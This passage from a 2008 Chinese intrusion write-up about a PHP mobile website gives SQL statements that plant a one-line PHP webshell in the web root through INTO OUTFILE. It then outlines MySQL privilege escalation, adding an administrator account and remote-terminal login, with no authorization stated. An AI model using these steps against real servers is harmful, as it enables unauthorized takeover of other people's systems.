对某PHP手机网站的一次安全检测
2008-12-25 13:43:55 来源:WEB开发网好的,我们现在来用在数据库里插入一句话木马。语句如下:
Create TABLE a (cmd text NOT NULL);
//创建一个表a,包含一个字段cmd
Insert INTO a (cmd) VALUES('');
//在字段cmd中插入一句话木马,木马内容为
select cmd from a into outfile 'E:/new_site/haosec.com.php';
//将cmd字段内容导出到E:/new_site/haosec.com.php
这样在根目录下就会有一个文件,文件内容为 ,也就是我们所说的一句话木马,那么我们只需要用控制端去连接他就可以了,连接成功(如图15)
PHP手机网站的一次安全检测" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图15
不过如果在导出之后,发现导出文件是报错的或不能使用,大家可以尝试使用容错的一句话木马,即来解决这一问题。
有了,提权也就不是什么困难的事情了,MYSQL提权,我朋友小飞做的教程非常不错,大家可以到网上去搜一下MYSQL提权,很多。
加完管理员后,上传工具开了终端,登陆上去(如图16)。
PHP手机网站的一次安全检测" border="0" onload="return imgzoom(this,550);" style="cursor:pointer;" onclick="javascript:window.open(this.src);"/>
图16
至此,入侵检测就告一段落了,应该是拿到了服务器的最高权限。
其实,我是一个完全不懂PHP的人,只是在做入侵检测之前,学习了一下。其实,这次入侵检测完成以后,给我最大的一个感受就是,中国的网络安全技术为什么同国外差距这么大,就是因为惰性的原因,其实入侵检测并不难,网上的知识足够我们学的,真的希望中国的网络安全技术能够真正的强大起来,而不只是梦想而已。
更多精彩
赞助商链接